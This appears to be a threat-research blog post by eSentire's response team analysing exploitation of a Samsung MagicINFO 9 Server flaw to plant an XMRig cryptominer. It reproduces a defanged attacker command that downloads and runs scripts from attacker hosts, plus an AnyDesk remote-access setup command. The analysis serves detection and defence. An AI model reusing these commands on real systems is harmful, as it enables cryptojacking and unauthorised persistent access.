Combine cutting-edge XDR technology, multi-signal threat intelligence and 24/7 Elite Threat Hunters to help you build a world-class security operation.
Get unlimited Incident Response with threat suppression guarantee - anytime, anywhere.
CTEM and advisory programs that identify security gaps and build proactive strategies to address them.
24/7 SOC-as-a-Service with unlimited threat hunting and incident handling.
XDR with machine learning that eliminates noise, enables real-time detection and response, and automatically blocks threats.
Seamless integration and threat investigation across your existing tech stack.
Proactive threat intelligence, original threat research and a world-class team of seasoned industry veterans.
Extend your team capabilities and prevent business disruption with expertise from eSentire.
We balance automated blocks with rapid human-led investigations to manage threats.
Flexible MDR pricing and packages that fit your unique security requirements.
Entry level foundational MDR coverage
Comprehensive Next Level MDR from eSentire
Next Level MDR with Cyber Risk Advisors to continuously advance your security program
Stop ransomware before it spreads.
Meet regulatory compliance mandates.
Detect and respond to zero-day exploits.
End misconfigurations and policy violations.
Defend third-party and supply chain risk.
Prevent disruption by outsourcing MDR.
Adopt a risk-based security approach.
Meet insurability requirements with MDR.
Protect your most sensitive data.
Build a proven security program.
Operationalize timely, accurate, and actionable cyber threat intelligence.
THE THREAT On May 13th, Ivanti disclosed two zero-day vulnerabilities, CVE-2025-4427 and CVE-2025-4428, impacting Ivanti Endpoint Manager Mobile (EPMM). Ivanti confirmed that…
Apr 25, 2025THE THREAT On April 24th, SAP disclosed a maximum severity vulnerability impacting SAP NetWeaver systems. The vulnerability was initially reported to SAP by researchers from…
eSentire is The Authority in Managed Detection and Response Services, protecting the critical data and applications of 2000+ organizations in 80+ countries from known and unknown cyber threats. Founded in 2001, the company’s mission is to hunt, investigate and stop cyber threats before they become business disrupting events.
We provide sophisticated cybersecurity solutions for Managed Security Service Providers (MSSPs), Managed Service Providers (MSPs), and Value-Added Resellers (VARs). Find out why you should partner with eSentire, the Authority in Managed Detection and Response, today.
Multi-Signal MDR with 300+ technology integrations to support your existing investments.
24/7 SOC-as-a-Service with unlimited threat hunting and incident handling.
We offer three flexible MDR pricing packages that can be customized to your unique needs.
The latest security advisories, blogs, reports, industry publications and webinars published by TRU.
Compare eSentire to other Managed Detection and Response vendors to see how we stack up against the competition.
See why 2000+ organizations globally have chosen eSentire for their MDR Solution.
Adversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters and Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.
We have discovered some of the most dangerous threats and nation state attacks in our space – including the Kaseya MSP breach and the more_eggs malware.
Our Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced Threat Analytics driven by our Threat Response Unit – the TRU team.
In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We outline how we responded to the confirmed threat and what recommendations we have going forward.
Here’s the latest from our TRU Team…
During mid-May 2025, eSentire's Threat Response Unit (TRU) identified active exploitation of a critical security flaw (CVE-2025-4632) within Samsung MagicINFO 9 Server installations. This vulnerability enables unauthenticated malicious actors to write arbitrary files, including webshells, with system-level privileges.
This can be leveraged to achieve complete Remote Code Execution (RCE) capabilities on affected systems, providing unauthorized initial access to compromised servers. TRU observed the following activity as the attack progressed.
1. Initial Access: Threat actors leveraged CVE-2025-4632 to gain Remote Code Execution (RCE) capabilities on vulnerable systems.
2. Attack Progression:
3. Cryptomining Deployment:
4. Technical Methods:
In this TRU Positive, we provide a timeline, technical analysis of the attacker's toolset (including decoded scripts), and recommendations on how your organization can detect, and prevent, these threats.
The attack began with the exploitation of a critical vulnerability in Samsung MagicINFO 9 Server (CVE-2025-4632), which allows unauthenticated attackers to execute arbitrary commands on affected systems. This vulnerability is actively exploited in the wild, with public exploit code available, and has a CVSS score of 9.8, highlighting its high severity.
Telemetry shows that the legitimate process tomcat9.exe, associated with the MagicINFO application, was running since May 7, 2025. However, the first signs of malicious activity were observed on May 15, 2025.
The attack sequence was highly automated, with all initial commands executed within a two-minute window, indicating the use of scripted exploitation rather than manual intrusion.
The attack began with a reconnaissance command (included below) to probe the target system for potential existing compromise. The command uses the LOLBin tasklist to search for processes matching smi2.exe - their XMRig cryptomining payload. This initial check suggests a methodical approach, determining whether the system was already infected or actively mining cryptocurrency from a previous breach before proceeding with their attack sequence.
The next observed command was a multi-stage PowerShell command executed via cmd.exe, which performed several critical actions:
The full command, as observed in telemetry, can be seen in Figure 2.
Approximately 1.5 days later, on May 17th, the threat actor(s) returned and executed additional commands to reinforce persistence, create additional privileged accounts, and manipulate local groups. Commands included use of net user and net localgroup to add accounts to “Administrators” and “Remote Desktop Users” groups:
The attacker utilized both PowerShell (win.ps1) and batch scripts (win.bat) to download and execute XMRig, a Monero crypto-currency miner and dependencies. The scripts additionally employed multiple fallback mechanisms, including PowerShell, certutil, and curl, to ensure successful payload delivery even if some utilities were disabled or blocked.
The scripts were downloaded from 157.230.106[.]100 and crmmr[.]icc[.]me as can be seen below,
Example observed command:
cmd[.]exe /c "powershell -Command "if (Get-Process -Name smi2 -ErrorAction SilentlyContinue){exit 0}else{exit 1}" && echo RUNNING || (powershell -ExecutionPolicy Bypass -Command "& {try{(New-Object System[.]Net[.]WebClient).DownloadFile('hxxp://157[.]230[.]106[.]100/mobile/winapp[.]php?app=SMIW&port=80&xbf=smi2[.]exe&ar=1&dbg=1&sdir=[RND]&rdir=%TEMP%&dlt=pshell','%TEMP%\win.ps1');exit;}catch{try{(New-Object System[.]Net[.]WebClient).DownloadFile('hxxps://crmmr[.]icc[.]me/mobile/winapp[.]php?app=SMIWS&port=443&xbf=smi2[.]exe&ar=1&dbg=1&sdir=[RND]&rdir=%TEMP%&dlt=pshell','%TEMP%\win.ps1');exit;}}}" & powershell -ExecutionPolicy Bypass -File "%TEMP%\win.ps1" || (for /f "tokens=4-5 delims=. " %i in ('ver') do @if "%i"=="6" (certutil -urlcache -f "hxxp://157[.]230[.]106[.]100/mobile/winapp[.]php?app=SMIW&port=80&dlt=cutil&xbf=smi2[.]exe&dbg=1&ar=1&sdir=RND&rdir=%TEMP%" "%TEMP%\win[.]bat" || certutil -urlcache -f "hxxps://crmmr[.]icc[.]me/mobile/winapp[.]php?app=SMIWS&port=443&dlt=cutil&xbf=smi2[.]exe&dbg=1&ar=1&sdir=RND&rdir=%TEMP%" "%TEMP%\win[.]bat")) || curl -sk -o "%TEMP%\win[.]bat" "hxxp://157[.]230[.]106[.]100/mobile/winapp[.]php?app=SMIW&port=80&dlt=curl&xbf=smi2[.]exe&dbg=1&ar=1&sdir=RND&rdir=%TEMP%" || curl -sk -o "%TEMP%\win[.]bat" "hxxps://crmmr[.]icc[.]me/mobile/winapp[.]php?app=SMIWS&port=443&dlt=curl&xbf=smi2[.]exe&dbg=1&ar=1&sdir=RND&rdir=%TEMP%" || curl -sk "hxxp://157[.]230[.]106[.]100/mobile/winapp[.]php?app=SMIW&port=80&dlt=curl&xbf=smi2[.]exe&dbg=1&ar=1&sdir=RND&rdir=%TEMP%" > "%TEMP%\win[.]bat" & start "" /min cmd /c "%TEMP%\win[.]bat")"
The scripts were observed to be heavily parameterized, with environmental variables and multiple fallback mechanisms for payload delivery. This approach demonstrates the attacker’s resilience and adaptability in ensuring the cryptominer was delivered and executed regardless of environmental constraints.
The batch script (win.bat) is responsible for orchestrating the download and execution of the cryptominer payload. It sets up various variables, including the command-and-control (C2) server address, payload names, and download tools. The script checks for the presence of the mining process (smi2.exe) and, if not found, proceeds to download and execute the payload using curl or certutil, depending on what is available on the host.
Key functions of win.bat include:
The PowerShell script (win.ps1) complements the batch file by providing an alternative method for payload delivery and execution. It is invoked when PowerShell is available and not restricted by policy. The script typically downloads the miner payload using .NET WebClient or other available methods and executes it with specified arguments.
Both scripts are designed to evade detection by:
The final stage of the attack involved the installation and execution of XMRig, an open-source Monero miner, renamed as smi2.exe to evade detection. The miner was configured to use system resources for illicit cryptocurrency mining, leading to potential performance degradation and increased operational costs for the victim organization.
The attacker’s scripts ensured that the miner would be relaunched if terminated, and that it would not be detected by endpoint security due to the previously configured Defender exclusions.
Figure 7 shows the screenshot of the dropped configuration file. The XMRig configuration file indicates a persistent and stealthy cryptocurrency mining setup targeting Monero.
It defines multiple mining pool endpoints across various ports (80, 88, 443, 8000, and 4443) on two different IP addresses (173.249.48[.]227 and 185.213.26[.]27), suggesting both redundancy and an attempt to evade detection by blending into legitimate traffic patterns via standard and non-standard ports.
The miner is configured to run silently in the background with autosave enabled, and no log file specified, reducing its footprints. This setup is typical of illicit cryptojacking campaigns focused on stealth, performance, and thus profits.
During our investigation, we observed the threat actor deploying and executing AnyDesk on the compromised host, with extensive configuration via command-line arguments to enable advanced remote access features and ensure persistence. AnyDesk is a widely used remote desktop application designed for legitimate remote administration and support.
"C:\Windows\AD\anydesk.exe" --add-profile samsungmid +audio +input +clipboard +clipboard_files +block_input +sas +restart +file_manager +lock_desk +sysinfo +whiteboard +tcp_tunnel +vpn +user_pointer +privacy_feature +record_session & "%TEMP%\AD\anydesk.exe" --get-id & echo Samsungmi@1234 | "%TEMP%\AD\anydesk.exe" --add-profile samsungmid +audio +input +clipboard +clipboard_files +block_input +sas +restart +file_manager +lock_desk +sysinfo +whiteboard +tcp_tunnel +vpn +user_pointer +privacy_feature +record_session"
This configuration enables the attacker to remotely access the system, transfer files, share clipboard content, record sessions, and block user input, among other capabilities. The use of AnyDesk, a legitimate tool commonly found in enterprise environments, helps the threat actor(s) evade detection and maintain persistent access to compromised systems.
Indicators of Compromise can be found here.
The eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.